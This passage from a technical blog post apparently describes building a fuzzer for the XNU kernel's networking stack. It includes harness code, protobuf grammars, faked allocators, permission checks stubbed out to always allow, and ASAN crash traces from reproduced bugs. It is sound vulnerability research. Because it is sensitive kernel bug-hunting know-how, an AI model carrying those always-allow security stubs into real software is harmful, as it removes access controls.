int printf(const char* format, ...);

void Assert(const char* file, int line, const char* expression) {

  printf("%s: assert failed on line %d: %s\n", file, line, expression);

  __builtin_trap();

}

void IOBSDGetPlatformUUID() { assert(false); }

void IOMapperInsertPage() { assert(false); }

// ...


Then we just link this file into the XNU library we’re building by adding it to the source list:

set(XNU_SOURCES

    bsd/conf/param.c

    bsd/kern/kern_asl.c

    # ...

    fuzz/syscall_wrappers.c

    fuzz/ioctl.c

    fuzz/backend.c

    fuzz/stubs.c

    fuzz/fake_impls.c


As you can see, there are some other files I included in the XNU library that represent faked implementations and helper code to expose some internal kernel APIs. To make sure our fuzz target will call code in the linked library, and not some other host functions (syscalls) with a clashing name, we hide all of the symbols in
libxnu by default and then expose a set of wrappers that call those functions on our behalf. I hide all the names by default using a CMake setting set_target_properties(xnu PROPERTIES C_VISIBILITY_PRESET hidden). Then we can link in a file (fuzz/syscall_wrappers.c) containing wrappers like the following:

__attribute__((visibility("default"))) int accept_wrapper(int s, caddr_t name,

                                                          socklen_t* anamelen,

                                                          int* retval) {

  struct accept_args uap = {

      .s = s,

      .name = name,

      .anamelen = anamelen,

  };

  return accept(kernproc, &uap, retval);

}

Note the visibility attribute that explicitly exports the symbol from the library. Due to the simplicity of these wrappers I created a script to automate this called generate_fuzzer.py using syscalls.master.

With the stubs in place, we can start writing a fuzz target now and come back to deal with implementing them later. We will see a crash every time the target code attempts to use one of the functions we initially left out. Then we get to decide to either include the real implementation (and perhaps recursively require even more stubbed function implementations) or to fake the functionality.

A bonus of getting a build working with CMake was to create multiple targets with different instrumentation. Doing so allows me to generate coverage reports using clang-coverage:

target_compile_options(xnu-cov PRIVATE ${XNU_C_FLAGS} -DLIBXNU_BUILD=1 -D_FORTIFY_SOURCE=0 -fprofile-instr-generate -fcoverage-mapping)


With that, we just add a fuzz target file and a protobuf file to use with protobuf-mutator and we’re ready to get started:

protobuf_generate_cpp(NET_PROTO_SRCS NET_PROTO_HDRS fuzz/net_fuzzer.proto)

add_executable(net_fuzzer fuzz/net_fuzzer.cc ${NET_PROTO_SRCS} ${NET_PROTO_HDRS})

target_include_directories(net_fuzzer PRIVATE libprotobuf-mutator)

target_compile_options(net_fuzzer

                       PRIVATE -g

                               -std=c++11

                               -Werror

                               -Wno-address-of-packed-member

                               ${FUZZER_CXX_FLAGS})

if(APPLE)

target_link_libraries(net_fuzzer ${FUZZER_LD_FLAGS} xnu fuzzer protobuf-mutator ${Protobuf_LIBRARIES})

else()

target_link_libraries(net_fuzzer ${FUZZER_LD_FLAGS} xnu fuzzer protobuf-mutator ${Protobuf_LIBRARIES} pthread)

endif(APPLE)

Writing a Fuzz Target

At this point, we’ve assembled a chunk of XNU into a convenient library, but we still need to interact with it by writing a fuzz target. At first, I thought I might write many targets for different features, but I decided to write one monolithic target for this project. I’m sure fine-grained targets could do a better job for functionality that’s harder to fuzz, e.g., the TCP state machine, but we will stick to one for simplicity.

We’ll start by specifying an input grammar using protobuf, part of which is depicted below. This grammar is completely arbitrary and will be used by a corresponding C++ harness that we will write next. LibFuzzer has a plugin called libprotobuf-mutator that knows how to mutate protobuf messages. This will enable us to do grammar-based mutational fuzzing efficiently, while still leveraging coverage guided feedback. This is a very powerful combination.

message Socket {

  required Domain domain = 1;

  required SoType so_type = 2;

  required Protocol protocol = 3;

  // TODO: options, e.g. SO_ACCEPTCONN

}

message Close {

  required FileDescriptor fd = 1;

}

message SetSocketOpt {

  optional Protocol level = 1;

  optional SocketOptName name = 2;

  // TODO(nedwill): structure for val

  optional bytes val = 3;

  optional FileDescriptor fd = 4;

}

message Command {

  oneof command {

    Packet ip_input = 1;

    SetSocketOpt set_sock_opt = 2;

    Socket socket = 3;

    Close close = 4;

  }

}

message Session {

  repeated Command commands = 1;

  required bytes data_provider = 2;

}

I left some TODO comments intact so you can see how the grammar can always be improved. As I’ve done in similar fuzzing projects, I have a top-level message called Session that encapsulates a single fuzzer iteration or test case. This session contains a sequence of “commands” and a sequence of bytes that can be used when random, unstructured data is needed (e.g., when doing a copyin). Commands are syscalls or random packets, which in turn are their own messages that have associated data. For example, we might have a session that has a single Command message containing a “Socket” message. That Socket message has data associated with each argument to the syscall. In our C++-based target, it’s our job to translate messages of this custom specification into real syscalls and related API calls. We inform libprotobuf-mutator that our fuzz target expects to receive one “Session” message at a time via the macro DEFINE_BINARY_PROTO_FUZZER.

DEFINE_BINARY_PROTO_FUZZER(const Session &session) {

// ...

  std::set<int> open_fds;

  for (const Command &command : session.commands()) {

    int retval = 0;

    switch (command.command_case()) {

      case Command::kSocket: {

        int fd = 0;

        int err = socket_wrapper(command.socket().domain(),

                                 command.socket().so_type(),

                                 command.socket().protocol(), &fd);

        if (err == 0) {

          // Make sure we're tracking fds properly.

          if (open_fds.find(fd) != open_fds.end()) {

            printf("Found existing fd %d\n", fd);

            assert(false);

          }

          open_fds.insert(fd);

        }

        break;

      }

      case Command::kClose: {

        open_fds.erase(command.close().fd());

        close_wrapper(command.close().fd(), nullptr);

        break;

      }

      case Command::kSetSockOpt: {

        int s = command.set_sock_opt().fd();

        int level = command.set_sock_opt().level();

        int name = command.set_sock_opt().name();

        size_t size = command.set_sock_opt().val().size();

        std::unique_ptr<char[]> val(new char[size]);

        memcpy(val.get(), command.set_sock_opt().val().data(), size);

        setsockopt_wrapper(s, level, name, val.get(), size, nullptr);

        break;

      }

While syscalls are typically a straightforward translation of the protobuf message, other commands are more complex. In order to improve the structure of randomly generated packets, I added custom message types that I then converted into the relevant on-the-wire structure before passing it into ip_input. Here’s how this looks for TCP:

message Packet {

  oneof packet {

    TcpPacket tcp_packet = 1;

  }

}

message TcpPacket {

  required IpHdr ip_hdr = 1;

  required TcpHdr tcp_hdr = 2;

  optional bytes data = 3;

}

message IpHdr {

  required uint32 ip_hl = 1;

  required IpVersion ip_v = 2;

  required uint32 ip_tos = 3;

  required uint32 ip_len = 4;

  required uint32 ip_id = 5;

  required uint32 ip_off = 6;

  required uint32 ip_ttl = 7;

  required Protocol ip_p = 8;

  required InAddr ip_src = 9;

  required InAddr ip_dst = 10;

}

message TcpHdr {

  required Port th_sport = 1;

  required Port th_dport = 2;

  required TcpSeq th_seq = 3;

  required TcpSeq th_ack = 4;

  required uint32 th_off = 5;

  repeated TcpFlag th_flags = 6;

  required uint32 th_win = 7;

  required uint32 th_sum = 8;

  required uint32 th_urp = 9;

  // Ned's extensions

  required bool is_pure_syn = 10;

  required bool is_pure_ack = 11;

}

Unfortunately, protobuf doesn’t support a uint8 type, so I had to use uint32 for some fields. That’s some lost fuzzing performance. You can also see some synthetic TCP header flags I added to make certain flag combinations more likely: is_pure_syn and is_pure_ack. Now I have to write some code to stitch together a valid packet from these nested fields. Shown below is the code to handle just the TCP header.

std::string get_tcp_hdr(const TcpHdr &hdr) {

  struct tcphdr tcphdr = {

      .th_sport = (unsigned short)hdr.th_sport(),

      .th_dport = (unsigned short)hdr.th_dport(),

      .th_seq = __builtin_bswap32(hdr.th_seq()),

      .th_ack = __builtin_bswap32(hdr.th_ack()),

      .th_off = hdr.th_off(),

      .th_flags = 0,

      .th_win = (unsigned short)hdr.th_win(),

      .th_sum = 0, // TODO(nedwill): calculate the checksum instead of skipping it

      .th_urp = (unsigned short)hdr.th_urp(),

  };

  for (const int flag : hdr.th_flags()) {

    tcphdr.th_flags ^= flag;

  }

  // Prefer pure syn

  if (hdr.is_pure_syn()) {

    tcphdr.th_flags &= ~(TH_RST | TH_ACK);

    tcphdr.th_flags |= TH_SYN;

  } else if (hdr.is_pure_ack()) {

    tcphdr.th_flags &= ~(TH_RST | TH_SYN);

    tcphdr.th_flags |= TH_ACK;

  }

  std::string dat((char *)&tcphdr, (char *)&tcphdr + sizeof(tcphdr));

  return dat;

}


As you can see, I make liberal use of a custom grammar to enable better quality fuzzing. These efforts are worth it, as randomizing high level structure is more efficient. It will also be easier for us to interpret crashing test cases later as they will have the same high level representation.

High-Level Emulation

Now that we have the code building and an initial fuzz target running, we begin the first pass at implementing all of the stubbed code that is reachable by our fuzz target. Because we have a fuzz target that builds and runs, we now get instant feedback about which functions our target hits. Some core functionality has to be supported before we can find any bugs, so the first attempt to run the fuzzer deserves its own development phase. For example, until dynamic memory allocation is supported, almost no kernel code we try to cover will work considering how heavily such code is used.

We’ll be implementing our stubbed functions with fake variants that attempt to have the same semantics. For example, when testing code that uses an external database library, you could replace the database with a simple in-memory implementation. If you don’t care about finding database bugs, this often makes fuzzing simpler and more robust. For some kernel subsystems unrelated to networking we can use entirely different or null implementations. This process is reminiscent of high-level emulation, an idea used in game console emulation. Rather than aiming to emulate hardware, you can try to preserve the semantics but use a custom implementation of the API. Because we only care about testing networking, this is how we approach faking subsystems in this project.

I always start by looking at the original function implementation. If it’s possible, I just link in that code as well. But some functionality isn’t compatible with our fuzzer and must be faked. For example, zalloc should call the userland malloc since virtual memory is already managed by our host kernel and we have allocator facilities available. Similarly, copyin and copyout need to be faked as they no longer serve to copy data between user and kernel pages. Sometimes we also just “nop” out functionality that we don’t care about. We’ll cover these decisions in more detail later in the “High-Level Emulation” phase. Note that by implementing these stubs lazily whenever our fuzz target hits them, we immediately reduce the work in handling all the unrelated functions by an order of magnitude. It’s easier to stay motivated when you only implement fakes for functions that are used by the target code. This approach successfully saved me a lot of time and I’ve used it on subsequent projects as well. At the time of writing, I have 398 stubbed functions, about 250 functions that are trivially faked (return 0 or void functions that do nothing), and about 25 functions that I faked myself (almost all related to porting the memory allocation systems to userland).

Booting Up

As soon as we start running the fuzzer, we’ll run into a snag: many resources require a one-time initialization that happens on boot. The BSD half of the kernel is mostly initialized by calling the bsd_init function. That function, in turn, calls several subsystem-specific initialization functions. Keeping with the theme of supporting a minimally necessary subset of the kernel, rather than call bsd_init, we create a new function that only initializes parts of the kernel as needed.

Here’s an example crash that occurs without the one time kernel bootup initialization:

    #7 0x7effbc464ad0 in zalloc /source/build3/../fuzz/zalloc.c:35:3

    #8 0x7effbb62eab4 in pipepair_alloc /source/build3/../bsd/kern/sys_pipe.c:634:24

    #9 0x7effbb62ded5 in pipe /source/build3/../bsd/kern/sys_pipe.c:425:10

    #10 0x7effbc4588ab in pipe_wrapper /source/build3/../fuzz/syscall_wrappers.c:216:10

    #11 0x4ee1a4 in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:979:19

Our zalloc implementation (covered in the next section) failed because the pipe zone wasn’t yet initialized:

static int

pipepair_alloc(struct pipe **rp_out, struct pipe **wp_out)

{

        struct pipepair *pp = zalloc(pipe_zone);

Scrolling up in sys_pipe.c, we see where that zone is initialized:

void

pipeinit(void)

{

        nbigpipe = 0;

        vm_size_t zone_size;

        zone_size = 8192 * sizeof(struct pipepair);

        pipe_zone = zinit(sizeof(struct pipepair), zone_size, 4096, "pipe zone");

Sure enough, this function is called by bsd_init. By adding that to our initial setup function the zone works as expected. After some development cycles spent supporting all the needed bsd_init function calls, we have the following:

__attribute__((visibility("default"))) bool initialize_network() {

  mcache_init();

  mbinit();

  eventhandler_init();

  pipeinit();

  dlil_init();

  socketinit();

  domaininit();

  loopattach();

  ether_family_init();

  tcp_cc_init();

  net_init_run();

  int res = necp_init();

  assert(!res);

  return true;

}


The original
bsd_init is 683 lines long, but our initialize_network clone is the preceding short snippet. I want to remark how cool I found it that you could “boot” a kernel like this and have everything work so long as you implemented all the relevant stubs. It just goes to show a surprising fact: a significant amount of kernel code is portable, and simple steps can be taken to make it testable. These codebases can be modernized without being fully rewritten. As this “boot” relies on dynamic allocation, let’s look at how I implemented that next.

Dynamic Memory Allocation

Providing a virtual memory abstraction is a fundamental goal of most kernels, but the good news is this is out of scope for this project (this is left as an exercise for the reader). Because networking already assumes working virtual memory, the network stack functions almost entirely on top of high-level allocator APIs. This makes the subsystem amenable to “high-level emulation”. We can create a thin shim layer that intercepts XNU specific allocator calls and translates them to the relevant host APIs.

In practice, we have to handle three types of allocations for this project: “classic” allocations (malloc/calloc/free), zone allocations (zalloc), and mbuf (memory buffers). The first two types are more fundamental allocation types used across XNU, while mbufs are a common data structure used in low-level networking code.

The zone allocator is reasonably complicated, but we use a simplified model for our purposes: we just track the size assigned to a zone when it is created and make sure we malloc that size when zalloc is later called using the initialized zone. This could undoubtedly be modeled better, but this initial model worked quite well for the types of bugs I was looking for. In practice, this simplification affects exploitability, but we aren’t worried about that for a fuzzing project as we can assess that manually once we discover an issue. As you can see below, I created a custom zone type that simply stored the configured size, knowing that my zinit would return an opaque pointer that would be passed to my zalloc implementation, which could then use calloc to service the request. zfree simply freed the requested bytes and ignored the zone, as allocation sizes are tracked by the host malloc already.

struct zone {

  uintptr_t size;

};

struct zone* zinit(uintptr_t size, uintptr_t max, uintptr_t alloc,

                   const char* name) {

  struct zone* zone = (struct zone*)calloc(1, sizeof(struct zone));

  zone->size = size;

  return zone;

}

void* zalloc(struct zone* zone) {

  assert(zone != NULL);

  return calloc(1, zone->size);

}

void zfree(void* zone, void* dat) {

  (void)zone;

  free(dat);

}

Kalloc, kfree, and related functions were passed through to malloc and free as well. You can see fuzz/zalloc.c for their implementations. Mbufs (memory buffers) are more work to implement because they contain considerable metadata that is exposed to the “client” networking code.

struct m_hdr {

        struct mbuf     *mh_next;       /* next buffer in chain */

        struct mbuf     *mh_nextpkt;    /* next chain in queue/record */

        caddr_t         mh_data;        /* location of data */

        int32_t         mh_len;         /* amount of data in this mbuf */

        u_int16_t       mh_type;        /* type of data in this mbuf */

        u_int16_t       mh_flags;       /* flags; see below */

};

/*

 * The mbuf object

 */

struct mbuf {

        struct m_hdr m_hdr;

        union {

                struct {

                        struct pkthdr MH_pkthdr;        /* M_PKTHDR set */

                        union {

                                struct m_ext MH_ext;    /* M_EXT set */

                                char    MH_databuf[_MHLEN];

                        } MH_dat;

                } MH;

                char    M_databuf[_MLEN];               /* !M_PKTHDR, !M_EXT */

        } M_dat;

};


I didn’t include the
pkthdr nor m_ext structure definitions, but they are nontrivial (you can see for yourself in bsd/sys/mbuf.h). A lot of trial and error was needed to create a simplified mbuf format that would work. In practice, I use an inline buffer when possible and, when necessary, locate the data in one large external buffer and set the M_EXT flag. As these allocations must be aligned, I use posix_memalign to create them, rather than malloc. Fortunately ASAN can help manage these allocations, so we can detect some bugs with this modification.

Two bugs I reported via the Project Zero tracker highlight the benefit of the heap-based mbuf implementation. In the first report, I detected an mbuf double free using ASAN. While the m_free implementation tries to detect double frees by checking the state of the allocation, ASAN goes even further by quarantining recently freed allocations to detect the bug. In this case, it looks like the fuzzer would have found the bug either way, but it was impressive. The second issue linked is much subtler and requires some instrumentation to detect the bug, as it is a use after free read of an mbuf:

==22568==ERROR: AddressSanitizer: heap-use-after-free on address 0x61500026afe5 at pc 0x7ff60f95cace bp 0x7ffd4d5617b0 sp 0x7ffd4d5617a8

READ of size 1 at 0x61500026afe5 thread T0

    #0 0x7ff60f95cacd in tcp_input bsd/netinet/tcp_input.c:5029:25

    #1 0x7ff60f949321 in tcp6_input bsd/netinet/tcp_input.c:1062:2

    #2 0x7ff60fa9263c in ip6_input bsd/netinet6/ip6_input.c:1277:10

0x61500026afe5 is located 229 bytes inside of 256-byte region [0x61500026af00,0x61500026b000)

freed by thread T0 here:

    #0 0x4a158d in free /b/swarming/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:123:3

    #1 0x7ff60fb7444d in m_free fuzz/zalloc.c:220:3

    #2 0x7ff60f4e3527 in m_freem bsd/kern/uipc_mbuf.c:4842:7

    #3 0x7ff60f5334c9 in sbappendstream_rcvdemux bsd/kern/uipc_socket2.c:1472:3

    #4 0x7ff60f95821d in tcp_input bsd/netinet/tcp_input.c:5019:8

    #5 0x7ff60f949321 in tcp6_input bsd/netinet/tcp_input.c:1062:2

    #6 0x7ff60fa9263c in ip6_input bsd/netinet6/ip6_input.c:1277:10


Apple managed to catch this issue before I reported it, fixing it in iOS 13. I believe Apple has added some internal hardening or testing for mbufs that caught this bug. It could be anything from a hardened mbuf allocator like
GWP-ASAN, to an internal ARM MTE test, to simple auditing, but it was really cool to see this issue detected in this way, and also that Apple was proactive enough to find this themselves.

Accessing User Memory

When talking about this project with a fellow attendee at a fuzzing conference, their biggest question was how I handled user memory access. Kernels are never supposed to trust pointers provided by user-space, so whenever the kernel wants to access memory-mapped in userspace, it goes through intermediate functions copyin and copyout. By replacing these functions with our fake implementations, we can supply fuzzer-provided input to the tested code. The real kernel would have done the relevant copies from user to kernel pages. Because these copies are driven by the target code and not our testcase, I added a buffer in the protobuf specification to be used to service these requests.

Here’s a backtrace from our stub before we implement `copyin`. As you can see, when calling the `recvfrom` syscall, our fuzzer passed in a pointer as an argument.

    #6 0x7fe1176952f3 in Assert /source/build3/../fuzz/stubs.c:21:3

    #7 0x7fe11769a110 in copyin /source/build3/../fuzz/fake_impls.c:408:3

    #8 0x7fe116951a18 in __copyin_chk /source/build3/../bsd/libkern/copyio.h:47:9

    #9 0x7fe116951a18 in recvfrom_nocancel /source/build3/../bsd/kern/uipc_syscalls.c:2056:11

    #10 0x7fe117691a86 in recvfrom_nocancel_wrapper /source/build3/../fuzz/syscall_wrappers.c:244:10

    #11 0x4e933a in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:936:9

    #12 0x4e43b8 in LLVMFuzzerTestOneInput /source/build3/../fuzz/net_fuzzer.cc:631:1

I’ve extended the copyin specification with my fuzzer-specific semantics: when the pointer (void*)1 is passed as an address, we interpret this as a request to fetch arbitrary bytes. Otherwise, we copy directly from that virtual memory address. This way, we can begin by passing (void*)1 everywhere in the fuzz target to get as much cheap coverage as possible. Later, as we want to construct well-formed data to pass into syscalls, we build the data in the protobuf test case handler and pass a real pointer to it, allowing it to be copied. This flexibility saves us time while permitting the construction of highly-structured data inputs as we see fit.

int __attribute__((warn_unused_result))

copyin(void* user_addr, void* kernel_addr, size_t nbytes) {

  // Address 1 means use fuzzed bytes, otherwise use real bytes.

  // NOTE: this does not support nested useraddr.

  if (user_addr != (void*)1) {

    memcpy(kernel_addr, user_addr, nbytes);

    return 0;

  }

  if (get_fuzzed_bool()) {

    return -1;

  }

  get_fuzzed_bytes(kernel_addr, nbytes);

  return 0;

}

Copyout is designed similarly. We often don’t care about the data copied out; we just care about the safety of the accesses. For that reason, we make sure to memcpy from the source buffer in all cases, using a temporary buffer when a copy to (void*)1 occurs. If the kernel copies out of bounds or from freed memory, for example, ASAN will catch it and inform us about a memory disclosure vulnerability.

Synchronization and Threads

Among the many changes made to XNU’s behavior to support this project, perhaps the most extensive and invasive are the changes I made to the synchronization and threading model. Before beginning this project, I had spent over a year working on Chrome browser process research, where high level “sequences” are preferred to using physical threads. Despite a paucity of data races, Chrome still had sequence-related bugs that were triggered by randomly servicing some of the pending work in between performing synchronous IPC calls. In an exploit for a bug found by the AppCache fuzzer, sleep calls were needed to get the asynchronous work to be completed before queueing up some more work synchronously. So I already knew that asynchronous continuation-passing style concurrency could have exploitable bugs that are easy to discover with this fuzzing approach.

I suspected I could find similar bugs if I used a similar model for sockfuzzer. Because XNU uses multiple kernel threads in its networking stack, I would have to port it to a cooperative style. To do this, I provided no-op implementations for all of the thread management functions and sync primitives, and instead randomly called the work functions that would have been called by the real threads. This involved modifying code: most worker threads run in a loop, processing new work as it comes in. I modified these infinitely looping helper functions to do one iteration of work and exposed them to the fuzzer frontend. Then I called them randomly as part of the protobuf message. The main benefit of doing the project this way was improved performance and determinism. Places where the kernel could block the fuzzer were modified to return early. Overall, it was a lot simpler and easier to manage a single-threaded process. But this decision did not end up yielding as many bugs as I had hoped. For example, I suspected that interleaving garbage collection of various network-related structures with syscalls would be more effective. It did achieve the goal of removing threading-related headaches from deploying the fuzzer, but this is a serious weakness that I would like to address in future fuzzer revisions.

Randomness

Randomness is another service provided by kernels to userland (e.g. /dev/random) and in-kernel services requiring it. This is easy to emulate: we can just return as many bytes as were requested from the current test case’s data_provider field.

Authentication

XNU features some mechanisms (KAuth, mac checks, user checks) to determine whether a given syscall is permissible. Because of the importance and relative rarity of bugs in XNU, and my willingness to triage false positives, I decided to allow all actions by default. For example, the TCP multipath code requires a special entitlement, but disabling this functionality precludes us from finding Ian’s multipath vulnerability. Rather than fuzz only code accessible inside the app sandbox, I figured I would just triage whatever comes up and report it with the appropriate severity in mind.

For example, when we create a socket, the kernel checks whether the running process is allowed to make a socket of the given domain, type, and protocol provided their KAuth credentials:

static int

socket_common(struct proc *p,

    int domain,

    int type,

    int protocol,

    pid_t epid,

    int32_t *retval,

    int delegate)

{

        struct socket *so;

        struct fileproc *fp;

        int fd, error;

        AUDIT_ARG(socket, domain, type, protocol);

#if CONFIG_MACF_SOCKET_SUBSET

        if ((error = mac_socket_check_create(kauth_cred_get(), domain,

            type, protocol)) != 0) {

                return error;

        }

#endif /* MAC_SOCKET_SUBSET */

When we reach this function in our fuzzer, we trigger an assert crash as this functionality was  stubbed.

    #6 0x7f58f49b53f3 in Assert /source/build3/../fuzz/stubs.c:21:3

    #7 0x7f58f49ba070 in kauth_cred_get /source/build3/../fuzz/fake_impls.c:272:3

    #8 0x7f58f3c70889 in socket_common /source/build3/../bsd/kern/uipc_syscalls.c:242:39

    #9 0x7f58f3c7043a in socket /source/build3/../bsd/kern/uipc_syscalls.c:214:9

    #10 0x7f58f49b45e3 in socket_wrapper /source/build3/../fuzz/syscall_wrappers.c:371:10

    #11 0x4e8598 in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:655:19

Now, we need to implement kauth_cred_get. In this case, we return a (void*)1 pointer so that NULL checks on the value will pass (and if it turns out we need to model this correctly, we’ll crash again when the pointer is used).

void* kauth_cred_get() {

  return (void*)1;

}

Now we crash actually checking the KAuth permissions.

    #6 0x7fbe9219a3f3 in Assert /source/build3/../fuzz/stubs.c:21:3

    #7 0x7fbe9219f100 in mac_socket_check_create /source/build3/../fuzz/fake_impls.c:312:33

    #8 0x7fbe914558a3 in socket_common /source/build3/../bsd/kern/uipc_syscalls.c:242:15

    #9 0x7fbe9145543a in socket /source/build3/../bsd/kern/uipc_syscalls.c:214:9

    #10 0x7fbe921995e3 in socket_wrapper /source/build3/../fuzz/syscall_wrappers.c:371:10

    #11 0x4e8598 in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:655:19

    #12 0x4e76c2 in LLVMFuzzerTestOneInput /source/build3/../fuzz/net_fuzzer.cc:631:1

Now we simply return 0 and move on.

int mac_socket_check_create() { return 0; }

As you can see, we don’t always need to do a lot of work to fake functionality. We can opt for a much simpler model that still gets us the results we want.

Coverage Guided Development

We’ve paid a sizable initial cost to implement this fuzz target, but we’re now entering the longest and most fun stage of the project: iterating and maintaining the fuzzer. We begin by running the fuzzer continuously (in my case, I ensured it could run on ClusterFuzz). A day of work then consists of fetching the latest corpus, running a clang-coverage visualization pass over it, and viewing the report. While initially most of the work involved fixing assertion failures to get the fuzzer working, we now look for silent implementation deficiencies only visible in the coverage reports. A snippet from the report looks like the following:

Several lines of code have a column indicating that they have been covered tens of thousands of times. Below them, you can see a switch statement for handling the parsing of IP options. Only the default case is covered approximately fifty thousand times, while the routing record options are covered 0 times.

This excerpt from IP option handling shows that we don’t support the various packets well with the current version of the fuzzer and grammar. Having this visualization is enormously helpful and necessary to succeed, as it is a source of truth about your fuzz target. By directing development work around these reports, it’s relatively easy to plan actionable and high-value tasks around the fuzzer.

I like to think about improving a fuzz target by either improving “soundness” or “completeness.” Logicians probably wouldn’t be happy with how I’m loosely using these terms, but they are a good metaphor for the task. To start with, we can improve the completeness of a given fuzz target by helping it reach code that we know to be reachable based on manual review. In the above example, I would suspect very strongly that the uncovered option handling code is reachable. But despite a long fuzzing campaign, these lines are uncovered, and therefore our fuzz target is incomplete, somehow unable to generate inputs reaching these lines. There are two ways to get this needed coverage: in a top-down or bottom-up fashion. Each has its tradeoffs. The top-down way to cover this code is to improve the existing grammar or C++ code to make it possible or more likely. The bottom-up way is to modify the code in question. For example, we could replace switch (opt) with something like switch (global_fuzzed_data->ConsumeRandomEnum(valid_enums). This bottom-up approach introduces unsoundness, as maybe these enums could never have been selected at this point. But this approach has often led to interesting-looking crashes that encouraged me to revert the change and proceed with the more expensive top-down implementation. When it’s one researcher working against potentially hundreds of thousands of lines, you need tricks to prioritize your work. By placing many cheap bets, you can revert later for free and focus on the most fruitful areas.

Improving soundness is the other side of the coin here. I’ve just mentioned reverting unsound changes and moving those changes out of the target code and into the grammar. But our fake objects are also simple models for how their real implementations behave. If those models are too simple or directly inaccurate, we may either miss bugs or introduce them. I’m comfortable missing some bugs as I think these simple fakes enable better coverage, and it’s a net win. But sometimes, I’ll observe a crash or failure to cover some code because of a faulty model. So improvements can often come in the form of making these fakes better.

All in all, there is plenty of work that can be done at any given point. Fuzzing isn’t an all or nothing one-shot endeavor for large targets like this. This is a continuous process, and as time goes on, easy gains become harder to achieve as most bugs detectable with this approach are found, and eventually, there comes a natural stopping point. But despite working on this project for several months, it’s remarkably far from the finish line despite producing several useful bug reports. The cool thing about fuzzing in this way is that it is a bit like excavating a fossil. Each target is different; we make small changes to the fuzzer, tapping away at the target with a chisel each day and letting our coverage metrics, not our biases, reveal the path forward.

Packet Delivery

I’d like to cover one example to demonstrate the value of the “bottom-up” unsound modification, as in some cases, the unsound modification is dramatically cheaper than the grammar-based one. Disabling hash checks is a well-known fuzzer-only modification when fuzzer-authors know that checksums could be trivially generated by hand. But it can also be applied in other places, such as packet delivery.

When an mbuf containing a TCP packet arrives, it is handled by tcp_input. In order for almost anything meaningful to occur with this packet, it must be matched by IP address and port to an existing process control block (PCB) for that connection, as seen below.

void

tcp_input(struct mbuf *m, int off0)

{

// ...

        if (isipv6) {

            inp = in6_pcblookup_hash(&tcbinfo, &ip6->ip6_src, th->th_sport,

                &ip6->ip6_dst, th->th_dport, 1,

                m->m_pkthdr.rcvif);

        } else

#endif /* INET6 */

        inp = in_pcblookup_hash(&tcbinfo, ip->ip_src, th->th_sport,

            ip->ip_dst, th->th_dport, 1, m->m_pkthdr.rcvif);

Here’s the IPv4 lookup code. Note that faddr, fport_arg, laddr, and lport_arg are all taken directly from the packet and are checked against the list of PCBs, one at a time. This means that we must guess two 4-byte integers and two 2-byte shorts to match the packet to the relevant PCB. Even coverage-guided fuzzing is going to have a hard time guessing its way through these comparisons. While eventually a match will be found, we can radically improve the odds of covering meaningful code by just flipping a coin instead of doing the comparisons. This change is extremely easy to make, as we can fetch a random boolean from the fuzzer at runtime. Looking up existing PCBs and fixing up the IP/TCP headers before sending the packets is a sounder solution, but in my testing this change didn’t introduce any regressions. Now when a vulnerability is discovered, it’s just a matter of fixing up headers to match packets to the appropriate PCB. That’s light work for a vulnerability researcher looking for a remote memory corruption bug.

/*

 * Lookup PCB in hash list.

 */

struct inpcb *

in_pcblookup_hash(struct inpcbinfo *pcbinfo, struct in_addr faddr,

    u_int fport_arg, struct in_addr laddr, u_int lport_arg, int wildcard,

    struct ifnet *ifp)

{

// ...

    head = &pcbinfo->ipi_hashbase[INP_PCBHASH(faddr.s_addr, lport, fport,

        pcbinfo->ipi_hashmask)];

    LIST_FOREACH(inp, head, inp_hash) {

-               if (inp->inp_faddr.s_addr == faddr.s_addr &&

-                   inp->inp_laddr.s_addr == laddr.s_addr &&

-                   inp->inp_fport == fport &&

-                   inp->inp_lport == lport) {

+               if (!get_fuzzed_bool()) {

                        if (in_pcb_checkstate(inp, WNT_ACQUIRE, 0) !=

                            WNT_STOPUSING) {

                                lck_rw_done(pcbinfo->ipi_lock);

                                return inp;


Astute readers may have noticed that the PCBs are fetched from a hash table, so it’s not enough just to replace the check. The 4 values used in the linear search are used to calculate a PCB hash, so we have to make sure all PCBs share a single bucket, as seen in the diff below. The real kernel shouldn’t do this as lookups become O(n), but we only create a few sockets, so it’s acceptable.

diff --git a/bsd/netinet/in_pcb.h b/bsd/netinet/in_pcb.h

index a5ec42ab..37f6ee50 100644

--- a/bsd/netinet/in_pcb.h

+++ b/bsd/netinet/in_pcb.h

@@ -611,10 +611,9 @@ struct inpcbinfo {

        u_int32_t               ipi_flags;

 };

-#define INP_PCBHASH(faddr, lport, fport, mask) \

-       (((faddr) ^ ((faddr) >> 16) ^ ntohs((lport) ^ (fport))) & (mask))

-#define INP_PCBPORTHASH(lport, mask) \

-       (ntohs((lport)) & (mask))

+// nedwill: let all pcbs share the same hash

+#define        INP_PCBHASH(faddr, lport, fport, mask) (0)

+#define        INP_PCBPORTHASH(lport, mask) (0)

 #define INP_IS_FLOW_CONTROLLED(_inp_) \

        ((_inp_)->inp_flags & INP_FLOW_CONTROLLED)

Checking Our Work: Reproducing the Sample Bugs

With most of the necessary supporting code implemented, we can fuzz for a while without hitting any assertions due to unimplemented stubbed functions. At this stage, I reverted the fixes for the two inspiration bugs I mentioned at the beginning of this article. Here’s what we see shortly after we run the fuzzer with those fixes reverted:

==1633983==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61d00029f474 at pc 0x00000049fcb7 bp 0x7ffcddc88590 sp 0x7ffcddc87d58

WRITE of size 20 at 0x61d00029f474 thread T0

    #0 0x49fcb6 in __asan_memmove /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:30:3

    #1 0x7ff64bd83bd9 in __asan_bcopy fuzz/san.c:37:3

    #2 0x7ff64ba9e62f in icmp_error bsd/netinet/ip_icmp.c:362:2

    #3 0x7ff64baaff9b in ip_dooptions bsd/netinet/ip_input.c:3577:2

    #4 0x7ff64baa921b in ip_input bsd/netinet/ip_input.c:2230:34

    #5 0x7ff64bd7d440 in ip_input_wrapper fuzz/backend.c:132:3

    #6 0x4dbe29 in DoIpInput fuzz/net_fuzzer.cc:610:7

